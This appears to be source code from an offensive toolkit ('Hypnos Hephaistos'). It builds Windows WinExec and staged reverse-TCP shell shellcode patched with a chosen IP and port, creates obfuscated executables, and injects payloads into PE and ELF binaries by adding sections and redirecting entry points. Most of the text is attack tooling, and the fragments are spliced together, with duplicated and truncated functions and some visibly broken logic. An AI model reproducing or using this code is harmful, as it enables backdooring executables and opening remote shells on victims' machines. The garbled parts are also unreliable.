def GenerateWinExec(command: str):
'''
Generate a WinExec("cmd.exe /C {command}") shellcode.
-return SHELLCODE
'''
command = "\"" + command + "\""
HexCommand = LibDebug.StringToHex(LibDebug.RevertString(command))
ParsedHexCommand = ""
while len(HexCommand) % 8 != 0:
HexCommand = "20" + HexCommand
ebyte = ""
for nibble in HexCommand:
ebyte += nibble
if len(ebyte) == 8:
ParsedHexCommand += "push 0x" + ebyte + " ;" + \
bytearray.fromhex(ebyte).decode()+"\n"
ebyte = ""
Content = ""
with open("ASM/ShellCodes/Windows/" + Globals.Env.ARCH + "/Custom_Dynamic_WinExec.asm", mode='r+') as f:
Content = f.read()
for _ in range(0, len(Content)):
if 'push 0x636c6163 ; HEAPNOS' in Content:
Content = Content.replace(
'push 0x636c6163 ; HEAPNOS', ParsedHexCommand)
File = open("shellcode.asm", "w+")
File.write(Content)
File.close()
return ReadSHELLCODEASM("shellcode.asm")
def EditWinexec(shellcode, command):
'''
Edit WinExec shellcode file.
-return SHELLCODE
'''
command = "\"" + command + "\""
unparsed_HexCommand = LibDebug.StringToHex(LibDebug.RevertString(command))
while len(unparsed_HexCommand) % 8 != 0:
unparsed_HexCommand = "20" + unparsed_HexCommand
HexCommand = ""
for i in range(0,len(unparsed_HexCommand),8):
HexCommand += "68" + LibByteEditor.RevertBytes(unparsed_HexCommand[i:i+8])
unparsed_shellcode = shellcode.GetShellcode().replace("HYPNOS", HexCommand)
shellcode = SHELLCODE()
for i in range(0,len(unparsed_shellcode),2):
shellcode.opcodes.append(unparsed_shellcode[i:i+2])
return shellcode
def GetHexFromFile(inputfile: str):
'''
Return the full Hex of a file.
-return: string
'''
LibDebug.CheckFile(inputfile)
with open(inputfile, mode='rb') as f:
return f.read().hex()
def CreateBinFromHex(output: str, content: str):
'''
Create a new EXE with the specified HEX content.
-return: void
'''
try:
if len(content) % 2 != 0:
LibDebug.Log("ERROR", "New content isn't a valid HEX string.")
exit()
else:
LibDebug.Log("WORK", "Creating " + output + "..")
open(output, "wb").write(bytes.fromhex(content))
LibDebug.Log("WORK", "Reading the first bytes..")
with open(output, mode='rb') as f:
newcontent = f.read().hex()
LibDebug.Log("WORK", "Checking the first bytes...")
if newcontent[0:100] != content[0:100]:
LibDebug.Log(
"ERROR",
"Content of the new file is not the same as the new content."
)
else:
LibDebug.Log(
"SUCCESS", "Content seems correct. " + output +
" successfuly created.")
except:
LibDebug.Log("ERROR", "Failed to create the output file.")
exit()
def EditExistingContent(content: str, needle: str, replacement: str,
numberoftime: int, index: int):
'''
Edit a specified content of a string, a specified amount of time, at a specified position.
-return: string
'''
if content.find(needle) == -1:
LibDebug.Log("ERROR",
"Content " + replacement + " didn't found, aborting..")
exit()
else:
LibDebug.Log("SUCCESS",
"Content find here : " + str(content.find(needle)))
LibDebug.Log("WORK", "Editing..")
try:
return content.replace(needle, replacement, 1)
except:
LibDebug.Log("ERROR", "Error while replacing..")
def CreateBinFromClass(output: str, Pe):
'''
Create a new EXE with the specified PE class.
-return: void
'''
try:
content = Pe.ToHex()
if len(content) % 2 != 0:
LibDebug.Log("ERROR", "New content isn't a valid HEX string.")
exit()
else:
LibDebug.Log("WORK", "Creating " + output + "..")
open(output, "wb").write(bytes.fromhex(content))
LibDebug.Log(
"SUCCESS",
"Content seems correct. " + output + " successfuly created.")
except:
LibDebug.Log("ERROR", "Failed to create the output file.")
exit()
def GenerateCDRTShell(Ip: str, Port: str):
'''
Generate a Dynamic Reverse TCP Staged shellcode.
-return string
'''
HexIp = LibDebug.IpToHex(Ip)
HexPort = LibDebug.PortToHex(Port)
Content = ""
with open("ASM/ShellCodes/Windows/" + Globals.Env.ARCH + "/Custom_Dynamic_ReverseTCP_Shell.asm", mode='r+') as f:
Content = f.read()
NullByteTrigger = False
for i in range(0, len(HexIp), 2):
if HexIp[i:i+2] == "00":
NullByteTrigger = True
break
if NullByteTrigger:
HexIp = str(hex(int("ffffffff", 16) - int(HexIp, 16)))[2:]
HexPort = str(hex(int("ffff", 16) - int(HexPort, 16)))[2:]
Content = Content.replace(
'sub ebx, 0xfeffff80 ; HEAPNOS03 IP', "sub ebx, 0x" + HexIp + "; HEAPNOS03 IP")
Content = Content.replace(
'sub bx, 0x47DD ; HEAPNOS07 PORT', "sub bx, 0x" + HexPort + "; HEAPNOS07 PORT")
else:
for i in range(0, len(Content)):
Content = Content.replace('xor ebx,ebx ; HEAPNOS01', "; HEAPNOS01")
Content = Content.replace(
'mov ebx, 0xffffffff ; HEAPNOS02', "; HEAPNOS02")
Content = Content.replace(
'sub ebx, 0xfeffff80 ; HEAPNOS03', "; HEAPNOS03")
Content = Content.replace('push ebx ; HEAPNOS04', "; HEAPNOS04")
Content = Content.replace('xor ebx,ebx ; HEAPNOS05', "; HEAPNOS05")
Content = Content.replace(
'mov ebx, 0xffffffff ; HEAPNOS06', "; HEAPNOS06")
Content = Content.replace(
'sub bx, 0x47DD ; HEAPNOS07 PORT', "; HEAPNOS07")
Content = Content.replace('push bx ; HEAPNOS08', "; HEAPNOS08")
Content = Content.replace('; HEAPNOS09', "push 0x" + HexIp)
Content = Content.replace('; HEAPNOS10', "push word 0x" + HexPort)
File = open("shellcode.asm", "w+")
File.write(Content)
File.close()
return ReadSHELLCODEASM("shellcode.asm")
def ChangeCOFFTimestamp(Pe: LibPeAnnalyzer.PE, date: str):
'''
Change the timestamp of the COFF Header.
-return: LibPeAnnalyzer.PE
'''
LibDebug.Log("WORK", "Changing timestamp..")
try:
LibDebug.Log(
"WORK", "Before : " +
str(datetime.fromtimestamp(int(Pe.Coffheader.timedatestamp, 16))))
Pe.Coffheader.timedatestamp = str(
hex(
int(
time.mktime(
datetime.strptime(date, "%d/%m/%Y").timetuple()))))[2:]
LibDebug.Log(
"WORK", "After : " +
str(datetime.fromtimestamp(int(Pe.Coffheader.timedatestamp, 16))))
except:
LibDebug.Log("ERROR", "Failed to change the timestamp.")
exit()
return Pe
def AddContent(content: str, index: int, adding: str):
'''
Add specified hexstring into a specified content, at a specified position.
-return: string
'''
print("Trying to add new bytes...")
base_content = ""
if len(adding) % 2 != 0:
LibDebug.Log("ERROR", "New content isn't a valid HEX string.")
exit()
try:
LibDebug.Log(
"WORK", "Before : " + base_content[10:index] + " " +
base_content[index:10])
ret = base_content[:index] + adding + base_content[index:]
LibDebug.Log(
"WORK",
"After : " + base_content[10:index] + base_content[index:10])
LibDebug.Log("SUCCESS", "New bytes added.")
return ret
except:
LibDebug.Log("ERROR", "Failed to add the new bytes..")
def EditAllExistingContent(content: str, needle: str, replacement: str):
'''
Edit all the occurence of a specified needle in a string by his specified replacement.
-return: string
'''
if content.find(needle) == -1:
LibDebug.Log("ERROR",
"Content " + replacement + " didn't found, aborting..")
exit()
elif needle == replacement:
LibDebug.Log("ERROR", "New content is the same as the replacement.")
exit()
else:
while content.find(needle) != -1:
LibDebug.Log("SUCCESS",
"Content find here : " + str(content.find(needle)))
LibDebug.Log("WORK", "Editing..")
try:
content = content.replace(needle, replacement)
except:
print("Error while replacing..")
return content
def EditCDRTSX32(shellcode, Ip, Port):
'''
Edit Custom Dynamic Reverse TCP Shell shellcode x32 file.
-return SHELLCODE
'''
HexIp = LibByteEditor.RevertBytes(LibDebug.IpToHex(Ip))
HexPort = LibByteEditor.RevertBytes(LibDebug.PortToHex(Port))
NullByteTrigger = False
for i in range(0, len(HexIp), 2):
if HexIp[i:i+2] == "00":
NullByteTrigger = True
break
if NullByteTrigger:
HexIp = str(hex(int("ffffffff", 16) - int(HexIp, 16)))[2:]
HexPort = str(hex(int("ffff", 16) - int(HexPort, 16)))[2:]
unparsed_shellcode = shellcode.GetShellcode().replace('HYPNOS', "31dbbbffffffff81eb" + HexIp + "5331dbbbffffffff6681eb" + HexPort + "6653")
else:
for i in range(0, len(shellcode.GetShellcode())):
unparsed_shellcode = shellcode.GetShellcode().replace('HYPNOS', "68" + HexIp + "6668" + HexPort)
shellcode = SHELLCODE()
for i in range(0,len(unparsed_shellcode),2):
shellcode.opcodes.append(unparsed_shellcode[i:i+2])
return shellcode
def menu():
# inputfile = "test.out"
# outputfile = "ELFx64_EDITED_printf.out"
# LibObjCopy.test()
# HexContent = LibByteEditor.GetHexFromFile(inputfile)
# ElfInput = LibElfAnnalyzer.Extract(HexContent)
# ElfInput.Programheadertable.headertable[3].filesz = "0000000000003500"
# ElfInput.Programheadertable.headertable[3].memsz = "0000000000003500"
# # ElfInput.Programheadertable.headertable[5].offset = "000000000000304d"
# # ElfInput.Programheadertable.headertable[5].vaddr = "000000000000304d"
# # ElfInput.Programheadertable.headertable[5].paddr = "000000000000304d"
# print(ElfInput.Elfheader.entrypoint)
# ElfInput.Elfheader.entrypoint = ElfInput.Sectionheadertable.sectiontable[27].offset
# print(ElfInput.Elfheader.entrypoint)
# ElfInput.Sectionheadertable.sectiontable[27].flags = "0000000000000006"
# ElfInput.PrintProgramHeaderTable()
# LibByteEditor.CreateBinFromClass(outputfile,ElfInput)
# HexContent2 = LibByteEditor.GetHexFromFile(outputfile)
# if HexContent != HexContent2:
# print("shit")
# exit()
outputfile = LibObfuscator.RandomizedString(7) + ".exe"
print("Welcome to Hypnos Hephaistos Version")
print(
"Do you want to specify an executable to edit or did you want me to generate one ? [edit/generate] or [e/g] : ",
end="")
value = input()
case = ["generate", "edit", "e", "g"]
if value in case:
if value == "generate" or value == "g":
LibDebug.Log("WORK", "Generating executable..")
try:
ObfuscatedC = LibObfuscator.ObfuscateC(
LibObfuscator.GenerateC(50), 25)
inputfile = LibObfuscator.Compile(ObfuscatedC)
os.system("rm *.c")
LibDebug.Log("SUCCESS", inputfile + " generated..")
except:
LibDebug.Log("ERROR", "Generation failed..")
elif value == "edit" or value == "e":
LibDebug.Log("WORK", "Generating executable..")
print("There is the sample list :")
for (dirpath, _, filenames) in os.walk("EXECUTABLE"):
for file in filenames:
print(dirpath + "/" + file)
value = input("Enter the file you want to exploit : ")
LibDebug.CheckFile(value)
inputfile = value
else:
LibDebug.Log("ERROR", "Bad entry. Exiting.")
exit()
HexContent = LibByteEditor.GetHexFromFile(inputfile)
PeInput = LibPeAnnalyzer.Extract(HexContent)
if PeInput.Optionalpeheader.signature == "020b":
print("!! Your file is a X64 beware to pick a X64 shellcode !!")
elif PeInput.Optionalpeheader.signature == "010b":
print("!! Your file is a X32 beware to pick a X32 shellcode !!")
print("It's time to generate a shellcode .\nHere's a list of options :")
shellcodes = []
for (dirpath, _, filenames) in os.walk("SHELLCODES"):
for file in filenames:
shellcodes.append(
(dirpath + "/" + file).replace("\\", "/").replace(
"ASM/ShellCodes/", "").split(".")[0])
case = []
for i in range(0, len(shellcodes)):
case += str(i)
print(" " + str(i) + " - " +
shellcodes[i].replace("SHELLCODES/", ""))
import os
import sys
import platform
sys.path.insert(0, sys.path[0].replace("\\SRC\\Core\\Modules", ""))
from SRC.Libs import LibDebug
from SRC.Libs import LibObfuscator
from SRC.Libs import LibByteEditor
from SRC.Libs import LibPeAnnalyzer
from SRC.Libs import LibElfAnnalyzer
from SRC.Libs import LibShellcode
from SRC.Libs import LibPeEditor
from SRC.Libs import LibElfEditor
from SRC.Libs import LibObjCopy
Env = LibDebug.CheckEnv()
LibDebug.CheckHypnosReq()
def menu():
# inputfile = "test.out"
# outputfile = "ELFx64_EDITED_printf.out"
# LibObjCopy.test()
# HexContent = LibByteEditor.GetHexFromFile(inputfile)
# ElfInput = LibElfAnnalyzer.Extract(HexContent)
# ElfInput.Programheadertable.headertable[3].filesz = "0000000000003500"
# ElfInput.Programheadertable.headertable[3].memsz = "0000000000003500"
# # ElfInput.Programheadertable.headertable[5].offset = "000000000000304d"
def AddSection(Pe, sectionname: str, rawdata: str):
'''
Adding a new section to a specified PE object.
-return: void
'''
Pe.Coffheader.numberofsections = LibDebug.AdaptStringToHex(
str(hex(int(Pe.Coffheader.numberofsections, 16) + 1))[2:],
Pe.Coffheader.sizeof_numberofsections)
NewSection = LibPeAnnalyzer.IMAGESECTIONHEADER()
NewSection.name = LibByteEditor.RevertBytes(
LibDebug.AdaptStringToHex(
LibByteEditor.RevertBytes(LibDebug.StringToHex(sectionname)),
NewSection.sizeof_name))
NewSection.virtualsize = LibDebug.AdaptStringToHex(
LibByteEditor.AlignData(
len(rawdata) / 2, int(Pe.Optionalpeheader.sectionalignment, 16),
0), NewSection.sizeof_virtualsize)
NewSection.virtualaddress = LibDebug.AdaptStringToHex(
LibByteEditor.AlignData(
int(
Pe.SectionTable.sections[
int(Pe.Coffheader.numberofsections, 16) - 2].virtualsize,
16), int(Pe.Optionalpeheader.sectionalignment, 16),
int(
Pe.SectionTable.sections[
int(Pe.Coffheader.numberofsections, 16) -
2].virtualaddress, 16)), NewSection.sizeof_virtualaddress)
NewSection.sizeofrawdata = LibDebug.AdaptStringToHex(
LibByteEditor.AlignData(len(rawdata),
int(Pe.Optionalpeheader.filealignment, 16), 0),
NewSection.sizeof_sizeofrawdata)
ptr = LibByteEditor.AlignData(
int(
Pe.SectionTable.sections[int(Pe.Coffheader.numberofsections, 16) -
2].sizeofrawdata, 16),
int(Pe.Optionalpeheader.filealignment, 16),
int(
Pe.SectionTable.sections[int(Pe.Coffheader.numberofsections, 16) -
2].pointertorawdata, 16))
NewSection.pointertorawdata = LibDebug.AdaptStringToHex(
ptr, NewSection.sizeof_pointertorawdata)
NewSection.pointertorelocations = "00000000"
NewSection.pointertolinenumbers = "00000000"
NewSection.numberofrelocations = "0000"
NewSection.numberoflinenumbers = "0000"
if Globals.Env.ARCH == "AMD64":
NewSection.characteristics = "60000000"
else:
NewSection.characteristics = "c0000000"
Pe.SectionTable.sections.append(NewSection)
Pe.Optionalpeheader.sizeofimage = LibDebug.AdaptStringToHex(
str(
hex(
int(Pe.Optionalpeheader.sizeofimage, 16) + int(
Pe.SectionTable.sections[
int(Pe.Coffheader.numberofsections, 16) -
1].virtualsize, 16))[2:]),
Pe.Optionalpeheader.sizeof_sizeofimage)
for _ in range(len(rawdata) * 2):
rawdata += "00"
NewHex = str(Pe.ToHex()[:int(2 * int(
Pe.SectionTable.sections[int(Pe.Coffheader.numberofsections, 16) -
1].pointertorawdata, 16))])
NewHex += str("0" * len(NewSection.ToHex())) + rawdata
NewHex += str(Pe.ToHex()[int(2 * int(
int(
Pe.SectionTable.sections[int(Pe.Coffheader.numberofsections, 16) -
1].pointertorawdata, 16) +
int(
Pe.SectionTable.sections[int(Pe.Coffheader.numberofsections, 16) -
1].sizeofrawdata, 16))):])
Pe.Dummy.dum01 = NewHex[Pe.Dummy.dummyindex +
(len(NewSection.ToHex()) * 2):]
def ExtractProgramHeaderTable(content: str, Elf: ELF, index: int):
'''
Extract the PROGRAM header from a content and add it to a LibElfAnnalyzer.ELF class.
-return: int
'''
LibDebug.Log("WORK", "Extracting PROGRAM Header.")
for i in range(0, int(Elf.Elfheader.entrynumber_programheader, 16)):
Elf.Programheadertable.headertable.append(PROGRAMHEADER())
Elf.Programheadertable.headertable[i].type = LibByteEditor.RevertBytes(
content[index:index +
Elf.Programheadertable.headertable[i].sizeof_type])
index += Elf.Programheadertable.headertable[i].sizeof_type
if Elf.Elfheader.struct == "02": # x64
Elf.Programheadertable.headertable[
i].flags = LibByteEditor.RevertBytes(
content[index:index +
Elf.Programheadertable.headertable[i].sizeof_flags]
)
index += Elf.Programheadertable.headertable[i].sizeof_flags
Elf.Programheadertable.headertable[
i].offset = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x64_sizeof_offset])
index += Elf.Programheadertable.headertable[i].x64_sizeof_offset
Elf.Programheadertable.headertable[
i].vaddr = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x64_sizeof_vaddr])
index += Elf.Programheadertable.headertable[i].x64_sizeof_vaddr
Elf.Programheadertable.headertable[
i].paddr = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x64_sizeof_paddr])
index += Elf.Programheadertable.headertable[i].x64_sizeof_paddr
Elf.Programheadertable.headertable[
i].filesz = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x64_sizeof_filesz])
index += Elf.Programheadertable.headertable[i].x64_sizeof_filesz
Elf.Programheadertable.headertable[
i].memsz = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x64_sizeof_memsz])
index += Elf.Programheadertable.headertable[i].x64_sizeof_memsz
Elf.Programheadertable.headertable[
i].align = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x64_sizeof_align])
index += Elf.Programheadertable.headertable[i].x64_sizeof_align
elif Elf.Elfheader.struct == "01": # x32
Elf.Programheadertable.headertable[
i].offset = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x32_sizeof_offset])
index += Elf.Programheadertable.headertable[i].x32_sizeof_offset
Elf.Programheadertable.headertable[
i].vaddr = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x32_sizeof_vaddr])
index += Elf.Programheadertable.headertable[i].x32_sizeof_vaddr
Elf.Programheadertable.headertable[
i].paddr = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x32_sizeof_paddr])
index += Elf.Programheadertable.headertable[i].x32_sizeof_paddr
Elf.Programheadertable.headertable[
i].filesz = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x32_sizeof_filesz])
index += Elf.Programheadertable.headertable[i].x32_sizeof_filesz
Elf.Programheadertable.headertable[
i].memsz = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x32_sizeof_memsz])
index += Elf.Programheadertable.headertable[i].x32_sizeof_memsz
Elf.Programheadertable.headertable[
i].flags = LibByteEditor.RevertBytes(
content[index:index +
Elf.Programheadertable.headertable[i].sizeof_flags]
)
index += Elf.Programheadertable.headertable[i].sizeof_flags
Elf.Programheadertable.headertable[
i].align = LibByteEditor.RevertBytes(
content[index:index + Elf.Programheadertable.
headertable[i].x32_sizeof_align])
index += Elf.Programheadertable.headertable[i].x32_sizeof_align
LibDebug.Log("SUCCESS", "End of the PROGRAM Header extraction.")
return index
def ExtractELFHeader(content: str, Elf: ELF, index: int):
'''
Extract the ELF header from a content and add it to a LibElfAnnalyzer.ELF class.
-return: int
'''
LibDebug.Log("WORK", "Extracting ELF Header.")
Elf.Elfheader.magic = content[index:index + Elf.Elfheader.sizeof_magic]
index += Elf.Elfheader.sizeof_magic
Elf.Elfheader.struct = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_struct])
index += Elf.Elfheader.sizeof_struct
Elf.Elfheader.endianness = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_endianness])
index += Elf.Elfheader.sizeof_endianness
Elf.Elfheader.elfheaderversion = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_elfheaderversion])
index += Elf.Elfheader.sizeof_elfheaderversion
Elf.Elfheader.osabi = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_osabi])
index += Elf.Elfheader.sizeof_osabi
Elf.Elfheader.abiversion = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_abiversion])
index += Elf.Elfheader.sizeof_abiversion
Elf.Elfheader.dummy = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_dummy])
index += Elf.Elfheader.sizeof_dummy
Elf.Elfheader.filetype = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_filetype])
index += Elf.Elfheader.sizeof_filetype
Elf.Elfheader.machine = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_machine])
index += Elf.Elfheader.sizeof_machine
Elf.Elfheader.machineversion = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_machineversion])
index += Elf.Elfheader.sizeof_machineversion
if Elf.Elfheader.struct == "01": # x32
Elf.Elfheader.entrypoint = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.x32_sizeof_entrypoint])
index += Elf.Elfheader.x32_sizeof_entrypoint
Elf.Elfheader.offset_programheader = LibByteEditor.RevertBytes(
content[index:index +
Elf.Elfheader.x32_sizeof_offset_programheader])
index += Elf.Elfheader.x32_sizeof_offset_programheader
Elf.Elfheader.offset_sectionsheader = LibByteEditor.RevertBytes(
content[index:index +
Elf.Elfheader.x32_sizeof_offset_sectionsheader])
index += Elf.Elfheader.x32_sizeof_offset_sectionsheader
elif Elf.Elfheader.struct == "02": # x64
Elf.Elfheader.entrypoint = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.x64_sizeof_entrypoint])
index += Elf.Elfheader.x64_sizeof_entrypoint
Elf.Elfheader.offset_programheader = LibByteEditor.RevertBytes(
content[index:index +
Elf.Elfheader.x64_sizeof_offset_programheader])
index += Elf.Elfheader.x64_sizeof_offset_programheader
Elf.Elfheader.offset_sectionsheader = LibByteEditor.RevertBytes(
content[index:index +
Elf.Elfheader.x64_sizeof_offset_sectionsheader])
index += Elf.Elfheader.x64_sizeof_offset_sectionsheader
Elf.Elfheader.procflags = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_procflags])
index += Elf.Elfheader.sizeof_procflags
Elf.Elfheader.elfheadersize = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_elfheadersize])
index += Elf.Elfheader.sizeof_elfheadersize
Elf.Elfheader.entrysize_programheader = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_entrysize_programheader])
index += Elf.Elfheader.sizeof_entrysize_programheader
Elf.Elfheader.entrynumber_programheader = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_entrynumber_programheader])
index += Elf.Elfheader.sizeof_entrynumber_programheader
Elf.Elfheader.entrysize_sectionheader = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_entrysize_sectionheader])
index += Elf.Elfheader.sizeof_entrysize_sectionheader
Elf.Elfheader.entrynumber_sectionheader = LibByteEditor.RevertBytes(
content[index:index + Elf.Elfheader.sizeof_entrynumber_sectionheader])
index += Elf.Elfheader.sizeof_entrynumber_sectionheader
Elf.Elfheader.sectionnames_sectiontable_index = LibByteEditor.RevertBytes(
content[index:index +
Elf.Elfheader.sizeof_sectionnames_sectiontable_index])
index += Elf.Elfheader.sizeof_sectionnames_sectiontable_index
LibDebug.Log("SUCCESS", "End of the ELF Header extraction.")
return index
def ExtractSectionHeaderTable(content: str, Elf: ELF, index: int):
'''
Extract the SECTION header table from a content and add it to a LibElfAnnalyzer.ELF class.
-return: int
'''
LibDebug.Log("WORK", "Extracting SECTION Header Table.")
for i in range(0, int(Elf.Elfheader.entrynumber_sectionheader, 16)):
Elf.Sectionheadertable.sectiontable.append(SECTIONHEADER())
Elf.Sectionheadertable.sectiontable[
i].name = LibByteEditor.RevertBytes(
content[index:index +
Elf.Sectionheadertable.sectiontable[i].sizeof_name])
index += Elf.Sectionheadertable.sectiontable[i].sizeof_name
Elf.Sectionheadertable.sectiontable[
i].type = LibByteEditor.RevertBytes(
content[index:index +
Elf.Sectionheadertable.sectiontable[i].sizeof_type])
index += Elf.Sectionheadertable.sectiontable[i].sizeof_type
if Elf.Elfheader.struct == "02": # x64
Elf.Sectionheadertable.sectiontable[
i].flags = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x64_sizeof_flags])
index += Elf.Sectionheadertable.sectiontable[i].x64_sizeof_flags
Elf.Sectionheadertable.sectiontable[
i].addr = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x64_sizeof_addr])
index += Elf.Sectionheadertable.sectiontable[i].x64_sizeof_addr
Elf.Sectionheadertable.sectiontable[
i].offset = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x64_sizeof_offset])
index += Elf.Sectionheadertable.sectiontable[i].x64_sizeof_offset
Elf.Sectionheadertable.sectiontable[
i].size = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x64_sizeof_size])
index += Elf.Sectionheadertable.sectiontable[i].x64_sizeof_size
elif Elf.Elfheader.struct == "01": # x32
Elf.Sectionheadertable.sectiontable[
i].flags = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x32_sizeof_flags])
index += Elf.Sectionheadertable.sectiontable[i].x32_sizeof_flags
Elf.Sectionheadertable.sectiontable[
i].addr = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x32_sizeof_addr])
index += Elf.Sectionheadertable.sectiontable[i].x32_sizeof_addr
Elf.Sectionheadertable.sectiontable[
i].offset = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x32_sizeof_offset])
index += Elf.Sectionheadertable.sectiontable[i].x32_sizeof_offset
Elf.Sectionheadertable.sectiontable[
i].size = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x32_sizeof_size])
index += Elf.Sectionheadertable.sectiontable[i].x32_sizeof_size
Elf.Sectionheadertable.sectiontable[
i].link = LibByteEditor.RevertBytes(
content[index:index +
Elf.Sectionheadertable.sectiontable[i].sizeof_link])
index += Elf.Sectionheadertable.sectiontable[i].sizeof_link
Elf.Sectionheadertable.sectiontable[
i].info = LibByteEditor.RevertBytes(
content[index:index +
Elf.Sectionheadertable.sectiontable[i].sizeof_info])
index += Elf.Sectionheadertable.sectiontable[i].sizeof_info
if Elf.Elfheader.struct == "02": # x64
Elf.Sectionheadertable.sectiontable[
i].addralign = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x64_sizeof_addralign])
index += Elf.Sectionheadertable.sectiontable[
i].x64_sizeof_addralign
Elf.Sectionheadertable.sectiontable[
i].entsize = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x64_sizeof_entsize])
index += Elf.Sectionheadertable.sectiontable[i].x64_sizeof_entsize
elif Elf.Elfheader.struct == "01": # x32
Elf.Sectionheadertable.sectiontable[
i].addralign = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x32_sizeof_addralign])
index += Elf.Sectionheadertable.sectiontable[
i].x32_sizeof_addralign
Elf.Sectionheadertable.sectiontable[
i].entsize = LibByteEditor.RevertBytes(
content[index:index + Elf.Sectionheadertable.
sectiontable[i].x32_sizeof_entsize])
index += Elf.Sectionheadertable.sectiontable[i].x32_sizeof_entsize
LibDebug.Log("SUCCESS", "End of the PROGRAM Header extraction.")
return index
def AddSection(Elf, sectionname: str, rawdata: str):
'''
Adding a new section to a specified ELF object.
-return: void
'''
#Elf.Elfheader.entrynumber_programheader = LibDebug.AdaptStringToHex(str(hex(int(Elf.Elfheader.entrynumber_programheader, 16) + 1))[2:], Elf.Elfheader.sizeof_entrynumber_programheader)
Elf.Elfheader.entrynumber_sectionheader = LibDebug.AdaptStringToHex(
str(hex(int(Elf.Elfheader.entrynumber_sectionheader, 16) + 1))[2:],
Elf.Elfheader.sizeof_entrynumber_sectionheader)
content = ""
if Elf.Elfheader.struct == "01":
Elf.Elfheader.entrypoint = LibDebug.AdaptStringToHex(
str(
hex(
int((int(
Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) -
2].offset, 16) +
int(
Elf.Sectionheadertable.sectiontable[int(
Elf.Elfheader.entrynumber_sectionheader, 16) -
2].size,
16)))))[2:], Elf.Elfheader.x32_sizeof_entrypoint)
Elf.Elfheader.offset_sectionsheader = LibDebug.AdaptStringToHex(
str(
hex(
int(
int(
int(Elf.Elfheader.entrypoint, 16) * 2 +
int(len(rawdata))) / 2)))[2:],
Elf.Elfheader.x32_sizeof_offset_sectionsheader)
elif Elf.Elfheader.struct == "02":
Elf.Elfheader.entrypoint = LibDebug.AdaptStringToHex(
str(
hex(
int((int(
Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) -
2].offset, 16) +
int(
Elf.Sectionheadertable.sectiontable[int(
Elf.Elfheader.entrynumber_sectionheader, 16) -
2].size,
16)))))[2:], Elf.Elfheader.x64_sizeof_entrypoint)
Elf.Elfheader.offset_sectionsheader = LibDebug.AdaptStringToHex(
str(
hex(
int(
int(
int(Elf.Elfheader.entrypoint, 16) * 2 +
int(len(rawdata))) / 2)))[2:],
Elf.Elfheader.x64_sizeof_offset_sectionsheader)
print(
int(
Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) - 2].offset,
16))
index = int(
int(
Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) - 2].offset,
16) / 2)
index2 = int(
int(
Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) - 2].size, 16)
/ 2)
lastsectionindex = int(
int(
Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) - 3].name, 16)
/ 2)
print(Elf.Sectionheadertable.sectiontable[
int(Elf.Elfheader.entrynumber_sectionheader, 16) - 4].name)
namtable = ""
namtable += Elf.ToHex()[index:index + lastsectionindex]
namtable += "002E76616C"
namtable += Elf.ToHex()[index + lastsectionindex:index + index2]
section = LibElfAnnalyzer.SECTIONHEADER()
section.name = lastsectionindex
for nm in Elf.Sectionheadertable.sectiontable:
name = int(nm.name, 16)
if name > int(section.name):
name += len("002E76616C")
nm.name = LibDebug.AdaptStringToHex(str(hex(name))[2:], 4 * 2)
print(nm.name)
section.type = "00000001"
section.offset = Elf.Elfheader.entrypoint
if Elf.Elfheader.struct == "01":
section.flags = "00000004"
section.addr = "00000000"
